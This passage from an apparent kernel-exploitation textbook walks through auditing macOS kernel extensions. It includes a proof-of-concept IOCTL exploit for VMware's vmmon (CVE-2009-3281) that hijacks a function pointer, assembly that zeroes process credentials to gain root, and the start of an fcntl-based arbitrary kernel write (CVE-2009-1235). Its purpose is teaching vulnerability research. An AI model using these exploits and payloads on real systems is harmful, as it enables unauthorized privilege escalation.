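The loop above steps through the result as one contiguous array and uses the next field only as a "more records follow" marker. The following portable sketch shows that stepping rule in isolation. The model_kmod type and the limit parameter are hypothetical stand-ins for illustration and are not part of the Mach API.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-in for kmod_info_t: only the fields the loop uses. */
struct model_kmod {
    struct model_kmod *next;   /* non-NULL: another record follows in the array */
    const char        *name;
};

/* Count records with the same stepping rule as the snippet above:
 * move to the adjacent element while next is set, stop otherwise.
 * limit is the number of records the caller knows the array holds. */
static size_t count_kmods(const struct model_kmod *k, size_t limit)
{
    size_t n = 0;

    for (; k; k = k->next ? k + 1 : NULL) {
        assert(n < limit);     /* a bad next chain must not run off the array */
        n++;
    }
    return n;
}
```

Treating next as a flag rather than following it matters here because, presumably, the pointer values in the returned copy refer to kernel addresses that are meaningless in our process.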

IOKit

When writing device drivers on Mac OS X, developers generally utilize an API known as IOKit. An object-oriented framework, IOKit implements a limited version of C++ derived from Embedded C++. The implementation of this is in the libkern/ directory of the XNU source tree. This implementation of C++ has runtime-type information, multiple inheritance, templating, and exception handling removed.

Note

Since other C++ components are implemented, this means from a vulnerability hunter's perspective that C++-specific vulnerabilities are now possible in kernel space. Therefore, when auditing an IOKit kernel extension, you must keep an eye out for mismatched new and delete calls, such as creating a single object and then using delete[] on it, for example. Also, since GCC is used to compile these kernel extensions, new[] will actually wrap when allocating large numbers of objects.
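
The wrap mentioned in this note comes from the size computation: on a 32-bit kernel, the element count multiplied by the element size is truncated to 32 bits before the allocator sees it. Here is a minimal sketch of that arithmetic and of the check an auditor hopes to find in front of it. The helper names are ours, and the sketch ignores any bookkeeping bytes the compiler may add to an array allocation.

```c
#include <assert.h>
#include <stdint.h>

/* Size a 32-bit new[] would end up requesting: the product is truncated. */
static uint32_t array_alloc_size32(uint32_t count, uint32_t elem_size)
{
    return (uint32_t)((uint64_t)count * elem_size);
}

/* Returns 1 when count * elem_size does not fit in 32 bits. */
static int array_alloc_wraps32(uint32_t count, uint32_t elem_size)
{
    assert(elem_size != 0);
    return count > UINT32_MAX / elem_size;
}
```

With 4-byte objects, a user-controlled count of 0x40000001 would yield a request for only four bytes, while the code that follows still believes it owns more than a billion elements.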

The IOKit API is also a good source of information, since it exports a lot of information to user space accessible via several tools. For instance, we can use the ioalloccount and ioclasscount utilities to query the number of allocations and objects allocated by the IOKit API. Also, we can use the iostat command to query I/O statistics for the system.

Another feature IOKit provides is a device registry. This is a database that contains all the live/registered devices present on the system, along with their configuration information. We can use the ioreg command-line utility to query information from the Registry, or we can use the IORegistryExplorer GUI application to obtain a graphical view. The IOKit Registry can be a treasure trove of information during the exploitation process.

Kernel Extension Auditing

Because a lot of the kernel extensions available for Mac OS X are closed source, it makes sense to look at auditing kernel extension binaries to locate software vulnerabilities. The first step in that process is to look for manuals or documentation on the particular application. Any information you can gather in this way will make your task much easier. Typically, the next step is to enumerate the user-space-to-kernel transition points that the kernel extension exposes. These may be IOCTLs, system calls, a Mach port, a PF_SYSTEM socket, or a variety of other types of interfaces. One way to discover these interfaces is to reverse engineer the entire start() function for the kext from start to finish. Although this is time-consuming, it allows you to conclusively determine all the interface types as they are initialized.

For our purposes here, however, we will look at an existing vulnerability present in the vmmon kernel extension that ships with VMware Fusion. VMware has assigned this vulnerability a CVE ID of CVE-2009-3281 and an ID of VMSA-2009-0013, and has described it as an issue associated with performing an IOCTL call. An exploit already exists for this vulnerability (written by mu-b [digitlabs]), but since we are more concerned at this stage with the auditing process we will ignore his exploit for now.

To begin reverse engineering the vmmon binary we will use IDA Pro from Hex-Rays. IDA Pro is a commercial product, but older releases of the tool are available for free from the Hex-Rays Web site.B

To begin auditing our binary, we first fire up IDA Pro, and open the binary within the vmmon.kext/Contents/MacOS directory. As we mentioned previously, we now need to try to enumerate our user-space-to-kernel interfaces to begin auditing. Rather than reversing the whole start() function, though, we will take a shortcut. Because we know the names of the routines responsible for setting up these interfaces, we can simply open the Imports subview and search for their names, as shown in Figure 5.4.

Image

Figure 5.4 Looking for known function names in the imports section.

Looking around, we find a cdevsw_add() import. This is the function responsible for setting up a character device's file operation function pointers. To determine where this was called in the binary, we simply highlight the function and press the X key. This looks up the cross-references for the function, as shown in Figure 5.5.

Image

Figure 5.5 Checking for cross-references.

Figure 5.5 shows only one cross-reference, so we click OK to jump to it. From the kernel source code, we know the cdevsw_add() function has the following definition:

int cdevsw_add(int index, struct cdevsw * csw);

This function takes two arguments. The first is an index into an array called cdevsw[]. This array is responsible for storing all the file operation function pointers for each character device under devfs on the system. The index argument dictates where in the array the new device's operations will be stored. In our case, as shown in Figure 5.6, the value −1 is supplied as the index (0xFFFFFFFF). When cdevsw_add() sees a negative value, it uses the absolute value of the index instead, and then begins scanning for a usable slot from this location. However, the value of −1 will cause cdevsw_add() to start scanning from slot 0. The second argument to this function is of the type struct cdevsw. The definition for this structure looks like this:
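
The index handling just described can be modeled in a few lines. This is a sketch of the behavior as the text describes it, not the XNU implementation. The table size, the used[] array, and the function names are made up for illustration.

```c
#include <assert.h>

#define MODEL_NSLOTS 8          /* hypothetical table size, for illustration */

/* Where scanning starts for a negative index argument, per the description:
 * -1 starts at slot 0, any other negative value starts at its absolute value. */
static int model_scan_start(int index)
{
    assert(index < 0);
    return (index == -1) ? 0 : -index;
}

/* Pick a slot: a non-negative index is used as given, a negative one
 * triggers a scan for the first free slot at or after the start position.
 * used[i] != 0 marks an occupied slot. Returns -1 when nothing fits. */
static int model_pick_slot(int index, const int used[MODEL_NSLOTS])
{
    int i;

    if (index >= 0)
        return (index < MODEL_NSLOTS) ? index : -1;
    for (i = model_scan_start(index); i < MODEL_NSLOTS; i++)
        if (!used[i])
            return i;
    return -1;
}
```

Under this model, a driver that passes -1 simply receives the lowest free slot, which is why the resulting major number can differ from one boot to the next.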

struct cdevsw {

open_close_fcn_t *d_open;

open_close_fcn_t *d_close;

read_write_fcn_t *d_read;

read_write_fcn_t *d_write;

ioctl_fcn_t *d_ioctl;

stop_fcn_t *d_stop;

reset_fcn_t *d_reset;

struct tty **d_ttys;

select_fcn_t *d_select;

mmap_fcn_t *d_mmap;

strategy_fcn_t *d_strategy;

getc_fcn_t *d_getc;

putc_fcn_t *d_putc;

int d_type;

};

Each function pointer in this structure is used to define the different functions called when a read/write or similar operation is performed on a character device file on devfs. As you can see, the fifth element of this structure defines the function pointer for the IOCTL for this device. Okay, time to get back to IDA Pro for some more debugging.
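
Because every member before d_ioctl is a pointer, its position inside the structure is easy to predict on the 32-bit target. The sketch below models the layout with 4-byte fields to show where the IOCTL handler pointer should sit relative to the start of the structure. The cdevsw32 type is our own stand-in, needed because the machine compiling this sketch may use 8-byte pointers.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* 32-bit model of struct cdevsw: each pointer becomes a 4-byte field. */
struct cdevsw32 {
    uint32_t d_open, d_close, d_read, d_write;
    uint32_t d_ioctl;
    uint32_t d_stop, d_reset, d_ttys, d_select, d_mmap;
    uint32_t d_strategy, d_getc, d_putc;
    int32_t  d_type;
};

/* Address of the d_ioctl slot for a structure located at base. */
static uint32_t d_ioctl_slot(uint32_t base)
{
    assert(offsetof(struct cdevsw32, d_ioctl) == 0x10);
    return base + (uint32_t)offsetof(struct cdevsw32, d_ioctl);
}
```

If the structure in the binary follows this layout, the handler address is the fifth 32-bit word, 0x10 bytes past the start of the structure, and that is the word to look for once the structure has been located in the disassembly.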

Image

Figure 5.6 Tracking down the cdevsw_add() call.

In the highlighted area in Figure 5.6, you can see that 0xFFFFFFFF is passed as index; you can also see an interesting reference to the somewhat obscure name unk_EE60. From the declaration of the function and the assembly, we can determine that it is our cdevsw struct, but IDA Pro does not know that; that's why it named it after its offset/address. The good news is that we can tell IDA Pro that, and immediately the software will name for us all the members used at the various locations. Rather than adding all the different types for the function pointers used, we can change the type to the native void (*ptr)() type. To add our structure to IDA Pro, we press the Shift + F1 hotkey combination to open the Local Types subview. From this view we press the Insert key to add a new structure, and paste in our C code. Once this is done, we press the Enter key to add our structure, as shown in Figure 5.7.

Image

Figure 5.7 Adding a structure definition as a new type.

Now that IDA Pro knows about our structure, it is time to tell it that it has to apply the definition to the unk_EE60 location. To do this, we browse to unk_EE60 in the IDA View and press the Alt + Q hotkey combination. IDA Pro will open a window from where we can pick the type definition we want to associate to the specific memory location, as shown in Figure 5.8.

Image

Figure 5.8 Associating a type to a memory location.

We select cdevsw from the pop-up box and the unk_EE60 location is formatted according to our defined structure. That's pretty nice, since now we can expand the structure (by pressing the + key) and check the address of the d_ioctl member, which is where the vulnerability lies. This is shown in Figure 5.9.

Image

Figure 5.9 Expanding the structure definition to find the d_ioctl address.

From here we can clearly see the address of our IOCTL function: 0xC98. We can press the Enter key with this value selected to jump to it in our IDA View-A subview. With a few quick steps, we have just vastly reduced the amount of binary code we need to disassemble to hunt for the vulnerability. Not bad.

Tip

IOCTLs are a common source of vulnerabilities. The steps we presented here are a common and useful starting point when reverse engineering kexts to look for bugs.

Now that we know where our IOCTL is located in the binary, we can begin with the fun part: auditing it, looking for bugs. Before that, though, we must look at the kernel source code to see how the function is defined:

int ioctl(int fildes, unsigned long request, ...);

IOCTL functions typically take three arguments. The first is the file descriptor on which the IOCTL is being executed. This is usually an open devfs file. The second argument is an unsigned long that is used to indicate which functionality the IOCTL is to perform. Typical behavior for an IOCTL is to perform a switch case on this code to decide which action to perform. The final argument to an IOCTL is usually a void type pointer that can be used to represent any data that needs to be passed from user space to the particular IOCTL functionality.
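
The switch-on-request shape described here is worth having in mind before reading a disassembly of it. The following is a generic sketch, not code from any real driver. The request codes, the model_name buffer, and the handler name are hypothetical.

```c
#include <assert.h>
#include <errno.h>
#include <string.h>

/* Hypothetical request codes, for illustration only. */
#define MODEL_GET_VERSION 0x1001UL
#define MODEL_SET_NAME    0x1002UL

static char model_name[16];

/* Shape of a typical IOCTL handler: switch on request, interpret data
 * according to the selected case, reject anything unknown. */
static int model_ioctl(unsigned long request, void *data)
{
    assert(data != NULL);

    switch (request) {
    case MODEL_GET_VERSION:
        *(int *)data = 1;
        return 0;
    case MODEL_SET_NAME:
        /* Bounded copy: each case must validate what it takes from data. */
        strncpy(model_name, (const char *)data, sizeof(model_name) - 1);
        model_name[sizeof(model_name) - 1] = '\0';
        return 0;
    default:
        return ENOTTY;
    }
}
```

When auditing, each case is effectively its own small function with its own interpretation of data, so each one needs to be checked for missing validation separately.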

A good thing to do at this point is to use the N key in IDA Pro to name the function arguments appropriately. This will make the reverse-engineering process much clearer. Once we do this, we must begin the process of auditing the IOCTL for bugs. As we mentioned earlier in this section, IOCTLs generally start with a switch statement that checks the request argument against predefined values to determine which functionality is required. As such, the code begins by testing the file descriptor to make sure it's valid. It then goes straight into comparing the request argument against a series of predefined values, and then jumping to the code that is responsible. Locating the check-and-jump sequence (an excerpt of which is shown in Figure 5.10) is pretty straightforward, and after painstakingly auditing each of these by hand (or cheating and looking at mu-b's exploitC ) we find a value for request that seems to have a vulnerability.

Image

Figure 5.10 Disassembly of the IOCTL call: check-and-jump sequences.

Figure 5.11 shows a disassembly of the code associated with the 0x802E564A case (loc_1546, the target of the jump, is highlighted on top).

Image

Figure 5.11 Disassembly of the vulnerable IOCTL path.
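
It can also help to decode the request value itself. BSD request codes pack a direction, a parameter length, a group character, and a command number into 32 bits (see sys/ioccom.h). The sketch below assumes that vmmon follows this standard encoding, which the disassembly alone does not prove. The ioc_fields type and ioc_decode() name are ours.

```c
#include <assert.h>
#include <stdint.h>

/* Field layout of a BSD request code (values as in <sys/ioccom.h>). */
#define M_IOC_OUT      0x40000000u   /* kernel copies data out to the caller */
#define M_IOC_IN       0x80000000u   /* kernel copies data in from the caller */
#define M_IOCPARM_MASK 0x1fffu       /* 13-bit parameter length */

struct ioc_fields {
    int      in, out;    /* direction flags */
    unsigned len;        /* parameter length in bytes */
    char     group;      /* group character */
    unsigned num;        /* command number within the group */
};

static struct ioc_fields ioc_decode(uint32_t req)
{
    struct ioc_fields f;

    f.in    = (req & M_IOC_IN) != 0;
    f.out   = (req & M_IOC_OUT) != 0;
    f.len   = (req >> 16) & M_IOCPARM_MASK;
    f.group = (char)((req >> 8) & 0xff);
    f.num   = req & 0xff;
    assert(f.len <= M_IOCPARM_MASK);
    return f;
}
```

For 0x802E564A this yields a copy-in request carrying 0x2E (46) bytes of parameter data, group 'V', command 0x4A, which hints at how much of the caller's buffer the handler gets to see.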

The first thing that stands out is that the byte_EF60 global variable is tested against 0; if it is 0 it jumps down to loc_1584 (_text:0000155A). The code then takes the data argument (_text:00001584) and starts copying in four-byte increments (the offsets are 0x4, 0x8, 0xC, 0x10, etc.) into various unknown global variables (dword_D040, dword_D044, etc.). To understand this further, we need to see exactly what happens with those variables after our code is finished. To do this, we can once again use IDA Pro's cross-referencing capability to see what happens to each location.

By going down the list of locations and looking at each cross-reference in turn, we can see how they are used. The first location of interest is dword_D060, as you can see in Figure 5.12.

Image

Figure 5.12 Interesting cross-reference use of a controlled variable.

The cross-reference window shows something really interesting. The second (highlighted) reference shows a call using the global variable as an address, which means dword_D060 is a function pointer of some kind that is being set directly from the IOCTL. It is worthwhile to check what happens with this variable. As usual, we press Enter on the instruction to open it in our IDA View and we quickly realize, following the stream shown in Figure 5.13, that no sanity checking is being performed on the value provided before use.

Image

Figure 5.13 Disassembly of the instruction surrounding the use of our function pointer.

If we scroll up a little, we can see that this code takes place in the sub_372E function.

Next, if we press the X key to cross-reference this function, we can see that it's called from three places, all of which are within the Page_LateStart() function. If we go backward and cross-reference this again, we can see that Page_LateStart() is called directly after our function pointer is populated from within our IOCTL (_text:000015FE), as shown in Figure 5.14.

Image

Figure 5.14 Page_LateStart() call from within our IOCTL.

To recap, this basically means we can call an IOCTL from user space, set up a function pointer to point to an arbitrary location of our choice, and have it called: an exploit writer's dream. Before we can write up an exploit for this bug, however, we need to determine how to populate our first IOCTL argument, the file descriptor upon which the IOCTL acts. In other words, this means we need to know which file to open to access this code.

To accomplish this, we can go back to the Imports subview for this binary and search for the function responsible for setting up the device file itself within devfs. This function is called devfs_make_node(). Once we've found it, we can cross-reference it to find where it's called from. We find it inside the disassembly block in Figure 5.15.

Image

Figure 5.15 Finding the caller of devfs_make_node().

Why is it so important to find the caller of devfs_make_node()? Well, looking at the code, we see that the “vmmon” string is passed as the last argument to this function. This is the name of the device file on the devfs mount. This means the device we need to open is /dev/vmmon.

Now that we have the information we need, we can start crafting our exploit. To trigger the vulnerability, we must follow these steps:

  1. Open the /dev/vmmon file.

  2. Create a buffer that will populate the function pointer to a value of our choice.

  3. Call the ioctl() function with the appropriate code, passing in our buffer.

  4. Make sure our function pointer is called.

We are close now, but not there yet. There is still a slight restriction on our exploit. At the start of our IOCTL code path, after the request value is checked and our jump is taken, a global value is tested for 0:

__text:00001553 cmp ds:byte_EF60, 0

__text:0000155A jz short loc_1584

This jump must be taken for us to be able to populate this function pointer. To do this, we must work out what the byte_EF60 global variable is used for.

Once again, we can cross-reference this variable to see how it is used in the binary. Figure 5.16 shows the result.

Image

Figure 5.16 Cross-referencing the global variable byte_EF60.

The cross-reference that looks the most interesting in the list is highlighted. This is the only case where the value in our global variable is updated to 1, which means that if this code is executed before we try to exploit this bug we will be unable to trigger it. By selecting this entry and pressing Enter we can see (as shown in Figure 5.17) that this instruction is actually executed at the end of our IOCTL (_text:000015E8), right before our function pointer is called (_text:000015FE).

Image

Figure 5.17 Disassembly of the test for multiple attempts to set callbacks.

This means this IOCTL can be called in this way only once. Then, after the function pointers are set up, this code path can no longer be taken. We can infer from this that if VMware has been started on the machine we are trying to exploit, and these function pointers have already been populated, exploitation will not be possible.
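
To make the control flow concrete, here is a user-space toy model of what we have pieced together so far: a one-shot flag, an unchecked copy of a function pointer from caller-supplied data, and an immediate call through it. All names are ours, the return values are assumptions, and the real code copies many more fields than this.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

typedef void (*callback_t)(void);

static callback_t    model_callback;      /* plays the role of dword_D060 */
static unsigned char model_initialized;   /* plays the role of byte_EF60 */
static int           model_calls;         /* how often the callback ran */

/* Harmless target used to exercise the model. */
static void harmless_callback(void) { model_calls++; }

/* Toy version of the vulnerable path: if the flag is clear, take a function
 * pointer from the caller's buffer without validation, set the flag, and
 * call the pointer. Returns 0 on the first call, -1 once the flag is set. */
static int model_set_callbacks(const unsigned char *data, size_t len)
{
    assert(len >= sizeof(model_callback));
    if (model_initialized)
        return -1;
    memcpy(&model_callback, data, sizeof(model_callback));
    model_initialized = 1;
    model_callback();          /* attacker-chosen target in the real bug */
    return 0;
}
```

The second call failing is the model's version of the restriction described above: whoever reaches this path first decides where the pointer goes.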

Now that we have most of the information we need to trigger this vulnerability, we need to work out the offset, into our attack string, of the function pointer that will be called first after it is overwritten in our IOCTL. A quick way to do this is to use the Metasploit pattern_create.rb tool. This is a simple process; we can execute it as shown in the following code, specifying the length of our buffer (128 in this case):

-[luser@macosxbox]$ ./pattern_create.rb 128

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae

This tool is pretty straightforward. It creates a non-repeating sequence of ASCII characters that we can pass as a payload. After that, once we trigger an invalid pointer dereference, we will be able to look up the address used by the program in the pattern and calculate the correct offset. Let's see how this works. We'll start by inserting the string pattern into our exploit as the attack string, and pass it to our IOCTL function as the data parameter:

#include <stdio.h>

#include <stdlib.h>

#include <fcntl.h>

#include <sys/ioctl.h>

#include <sys/types.h>

#include <sys/param.h>

#include <unistd.h>

#define REQUEST 0x802E564A

char data[] =

"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae";

int main(int argc, char **argv)

{

int fd;

if((fd = open ("/dev/vmmon", O_RDONLY)) == -1 ){

printf("error: couldn't open /dev/vmmon\n");

exit(1);

}

ioctl(fd, REQUEST, data);

return 0;

}

If we compile and execute this code with a debugger attached, we are greeted with the following message:

Program received signal SIGTRAP, Trace/breakpoint trap.

0x41316241 in ?? ()

This shows that our exploit successfully overwrote one of the function pointers and it was executed. The value of EIP (0x41316241) is clearly in the ASCII character range provided by our buffer. To determine the offset we need, we simply provide this value as an argument to the pattern_offset.rb tool that ships with the Metasploit framework. This tool complements the pattern_create.rb tool, by generating the same buffer we used earlier and locating our EIP value within it.

-[dcbz@macosxbox:~/code/msf/tools]$ ./pattern_offset.rb 41316241

33
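
What the two tools do is simple enough to reproduce by hand. The sketch below is our own minimal C version, not the Metasploit code: it generates the same uppercase/lowercase/digit pattern and searches it for a 32-bit value laid out in little-endian byte order, as it would be in memory on x86.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Fill buf with the first len bytes of the Aa0Aa1Aa2... pattern. */
static void pattern_create(char *buf, size_t len)
{
    size_t i = 0, j;
    char up, lo, dg;

    assert(len <= 26 * 26 * 10 * 3);   /* the pattern repeats after this */
    for (up = 'A'; up <= 'Z'; up++)
        for (lo = 'a'; lo <= 'z'; lo++)
            for (dg = '0'; dg <= '9'; dg++) {
                const char triple[3] = { up, lo, dg };
                for (j = 0; j < 3; j++) {
                    if (i == len)
                        return;
                    buf[i++] = triple[j];
                }
            }
}

/* Offset of a little-endian 32-bit value within the pattern, or -1. */
static long pattern_offset(const char *buf, size_t len, uint32_t value)
{
    unsigned char needle[4];
    size_t i;

    needle[0] = (unsigned char)(value & 0xff);
    needle[1] = (unsigned char)((value >> 8) & 0xff);
    needle[2] = (unsigned char)((value >> 16) & 0xff);
    needle[3] = (unsigned char)((value >> 24) & 0xff);
    for (i = 0; i + 4 <= len; i++)
        if (memcmp(buf + i, needle, 4) == 0)
            return (long)i;
    return -1;
}
```

The value 0x41316241 corresponds to the bytes "Ab1A" in memory, and that four-character string first appears 33 bytes into the pattern.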

It looks like “33” is our guy. We can double-check this in our exploit by seeking 33 bytes into our array, and then writing out a custom value. We pick 0xdeadbeef, as it is easily recognizable as arbitrary code execution.

#define BUFFSIZE 128

#define OFFSET 33

char data[BUFFSIZE];

int main(int argc, char **argv)

{

[…]

memset(data,'A',BUFFSIZE);

ptr = (unsigned int *)&data[OFFSET];

*ptr = 0xdeadbeef;

ioctl(fd, REQUEST, data);

return 0;

}

Once again, if we compile and execute this code, it's clear that we have controlled execution. We are greeted with the familiar message that the processor is trying to fetch and execute the instruction at the memory location 0xdeadbeef.

Program received signal SIGTRAP, Trace/breakpoint trap.

0xdeadbeef in ?? ()
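
Since offset 33 is not a multiple of four, writing through a casted pointer relies on the processor tolerating unaligned stores, which x86 does. A slightly more portable way to build the same buffer is to copy the value in with memcpy(). This is a sketch with a helper name of our own choosing.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Fill buf with 'A' and place a 32-bit value at the given byte offset.
 * memcpy avoids dereferencing a misaligned pointer. The bytes land in host
 * byte order, which is little-endian on the x86 target discussed here. */
static void build_payload(unsigned char *buf, size_t len,
                          size_t offset, uint32_t value)
{
    assert(offset + sizeof(value) <= len);
    memset(buf, 'A', len);
    memcpy(buf + offset, &value, sizeof(value));
}
```

Calling build_payload(data, BUFFSIZE, OFFSET, 0xdeadbeef) would then stand in for the memset() and pointer assignment used in the listing above.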

Now that you know how to track down a bug and start writing a proof of concept to trigger the vulnerability, it is time to move on and turn this into a working, reliable exploit.

The Execution Step

Once again, for consistency we will begin our analysis of Mac OS X kernel exploitation by exploring the execution step. Like most other UNIX-derived operating systems, Mac OS X utilizes the uid/euid/gid/egid system for storing per-process authorization credentials. To accomplish this, the BSD system calls setuid/getuid/setgid/getgid and their brethren were implemented.

During exploitation, when we gain code execution we typically want to emulate the behavior of the setuid() system call, to set our process's user ID to the root account (uid=0) granting us full access to the system. To do this, we must learn to locate our authorization credentials in memory, and then change them. The first step in this process is to find and parse the proc struct.

You can find the definition of the proc struct in the header file bsd/sys/proc_internal.h within the XNU source tree. For now, however, we are most concerned with the fact that within the proc struct is a pointer to the user credentials structure (p_ucred) that contains UID information for the process. To easily work out which offset within the proc struct is the ucred structure we can reverse the proc_ucred function:

/* returns the cred associated with the process; temporary api */

kauth_cred_t proc_ucred(proc_t p)

This function takes a proc struct as an argument and returns the ucred struct from within it. If we fire up GDB and disassemble this function, we can see that it offsets the proc struct by 0x64 (100) bytes to retrieve the ucred struct.

0x0037c6a0 <proc_ucred+0>: push %ebp

0x0037c6a1 <proc_ucred+1>: mov %esp,%ebp

0x0037c6a3 <proc_ucred+3>: mov 0x8(%ebp),%eax

0x0037c6a6 <proc_ucred+6>: mov 0x64(%eax),%eax

0x0037c6a9 <proc_ucred+9>: leave

0x0037c6aa <proc_ucred+10>: ret

Finally, within our ucred struct lie the cr_uid and cr_ruid elements. These are clearly at offsets 0xc and 0x10 (12 and 16). To elevate our process's privileges to root, we need to set both of these fields to 0.

struct ucred {

TAILQ_ENTRY(ucred) cr_link; /* never modify this without KAUTH_CRED_HASH_LOCK */

u_long cr_ref; /* reference count */

/*

* The credential hash depends on everything from this point on

* (see kauth_cred_get_hashkey)

*/

uid_t cr_uid; /* effective user id */

uid_t cr_ruid; /* real user id */

uid_t cr_svuid; /* saved user id */

short cr_ngroups; /* number of groups in advisory list */

gid_t cr_groups[NGROUPS]; /* advisory group list */

gid_t cr_rgid; /* real group id */

gid_t cr_svgid; /* saved group id */

uid_t cr_gmuid; /* UID for group membership purposes */

struct auditinfo cr_au; /* user auditing data */

struct label *cr_label; /* MAC label */

int cr_flags; /* flags on credential */

/*

* NOTE: If anything else (besides the flags)

* added after the label, you must change

* kauth_cred_find().

*/

};

From the data structures shown in the preceding code, we can formulate that given a pointer to the proc struct in EAX the following instructions will elevate our privileges to those of the root user:

mov eax,[eax+0x64] ;get p_ucred *

mov dword [eax+0xc], 0x00000000 ;write 0x0 to cr_uid (effective uid)

mov dword [eax+0x10],0x00000000 ;write 0x0 to cr_ruid (real uid)
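
The same three steps can be rehearsed safely in user space. In the sketch below, a flat byte buffer stands in for kernel memory and "addresses" are simply offsets into it. The offsets are the ones derived above for this particular 32-bit kernel build. The helper names are ours.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PROC_UCRED_OFF 0x64   /* p_ucred within proc, from proc_ucred() */
#define CR_UID_OFF     0x0c   /* cr_uid within ucred */
#define CR_RUID_OFF    0x10   /* cr_ruid within ucred */

/* Read and write 32-bit words in the model memory. */
static uint32_t rd32(const unsigned char *mem, uint32_t addr)
{
    uint32_t v;
    memcpy(&v, mem + addr, sizeof(v));
    return v;
}

static void wr32(unsigned char *mem, uint32_t addr, uint32_t v)
{
    memcpy(mem + addr, &v, sizeof(v));
}

/* Same steps as the assembly: fetch p_ucred, then zero cr_uid and cr_ruid. */
static void model_elevate(unsigned char *mem, size_t size, uint32_t proc)
{
    uint32_t cred;

    assert((size_t)proc + PROC_UCRED_OFF + 4 <= size);
    cred = rd32(mem, proc + PROC_UCRED_OFF);
    assert((size_t)cred + CR_RUID_OFF + 4 <= size);
    wr32(mem, cred + CR_UID_OFF, 0);
    wr32(mem, cred + CR_RUID_OFF, 0);
}
```

Note that these offsets are tied to one kernel build. A payload meant to work across releases would need to derive them again, for example by disassembling proc_ucred() as we did above.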

Exploitation Notes

In this section, we will run through some of the common vectors of kernel exploitation and look at some examples in relation to XNU. Since XNU is a relatively young kernel (and hasn't attracted the attention of too many attackers yet), there are not a lot of published kernel vulnerabilities. This means that we had to contrive some of the examples in this section to demonstrate the techniques involved.

Arbitrary Memory Overwrite

The first type of vulnerability we will look at is a simple arbitrary kernel memory overwrite. As we described in Chapter 2 this kind of issue allows unprivileged user-level code running in Ring 3 to gain access to write anything anywhere in the kernel's address space. A vulnerability such as this was found by Razvan Musaloiu (and was fixed in Mac OS X 10.5.8) and was given the identifier CVE-2009-1235. We're analyzing this vulnerability first because it will make you think about what you can accomplish with a write anything/anywhere code construct to gain privilege elevation. Although this is a relatively simple task, it is a common situation as a result of successfully exploiting other aspects of the kernel, and therefore can be used as a building block.

Razvan described his understanding of this vulnerability on his Web site.2 This vulnerability revolves around the fact that by calling the device's ioctl() functions via the fcntl() system call, the third parameter (data) is treated as a kernel pointer rather than a pointer to/from user space.

As Razvan wrote in his description, the call stack for a call using fcntl() is very similar to the equivalent ioctl() call stack. However, a large block of code (fo_ioctl/vn_ioctl) that is responsible for sanitizing this behavior is skipped.
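
The difference between the two paths can be illustrated with a toy model. Here a 64-byte array plays the role of the address space, split into a "user" half and a "kernel" half, and a device handler produces eight bytes of output. This is our own simplification of the idea, not a transcription of the XNU code paths.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define MEM_SIZE    64
#define KERNEL_BASE 32          /* toy split: [0,32) user, [32,64) kernel */

static unsigned char mem[MEM_SIZE];      /* toy address space */
static const unsigned char handler_output[8] = { 1, 2, 3, 4, 5, 6, 7, 8 };

/* Device handler: writes its result wherever it is told to. */
static void handler(unsigned char *dst)
{
    memcpy(dst, handler_output, sizeof(handler_output));
}

/* ioctl-style path: the handler fills a staging buffer, and the result is
 * copied out only if the destination lies entirely in the user range. */
static int path_ioctl(size_t user_addr)
{
    unsigned char staging[8];

    handler(staging);
    if (user_addr > KERNEL_BASE - sizeof(staging))
        return -1;
    memcpy(mem + user_addr, staging, sizeof(staging));
    return 0;
}

/* fcntl-style path: the argument goes straight to the handler, which
 * treats it as a destination it can trust. */
static int path_fcntl(size_t addr)
{
    assert(addr + sizeof(handler_output) <= MEM_SIZE);
    handler(mem + addr);
    return 0;
}
```

In the first path a destination inside the kernel half is refused. In the second, the same destination is written without question.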

This means that all we need to exploit this vulnerability is an ioctl() that allows us to write arbitrary user-controlled data to this third parameter. Luckily for us, Razvan also points out one such call in his write-up: TIOCGWINSZ. This ioctl() is used to return the size of the window to the user, allowing the user to update the terminal size. This data is in the form of a winsize structure, which looks as follows:

struct winsize {

unsigned short ws_row; /* rows, in characters */

unsigned short ws_col; /* columns, in characters */

unsigned short ws_xpixel; /* horizontal size, pixels */

unsigned short ws_ypixel; /* vertical size, pixels */

};

Before we look at exploiting this vulnerability, let's look at the regular usage of the TIOCGWINSZ ioctl() function. The following code simply calls the IOCTL on the STDIN/STDOUT file handle and passes it the address of the wz winsize structure. It then displays each entry of the structure.

#include <stdio.h>

#include <stdlib.h>

#include <sys/ttycom.h>

#include <sys/ioctl.h>

int main(int ac, char **av)

{

struct winsize wz;

if(ioctl(0, TIOCGWINSZ, &wz) == -1){

printf("error: calling ioctl()\n");

exit(1);

}

printf("ws_row: %d\n",wz.ws_row);

printf("ws_col: %d\n",wz.ws_col);

printf("ws_xpixel: %d\n",wz.ws_xpixel);

printf("ws_ypixel: %d\n",wz.ws_ypixel);

return 0;

}

This code works as expected:

-[luser@macosxbox]$ gcc winsize.c -o winsize

-[luser@macosxbox]$ ./winsize

ws_row: 55

ws_col: 80

ws_xpixel: 0

ws_ypixel: 0

The kernel code responsible for copying this structure to data is located in the bsd/kern/tty.c file in the XNU source tree:

case TIOCGWINSZ: /* get window size */

*(struct winsize *)data = tp->t_winsize;

break;

It is easy to see that by controlling data and making it a pointer at the kernel level, we can write almost arbitrary data in arbitrary locations. The most important thing now is to figure out how to control what we write.

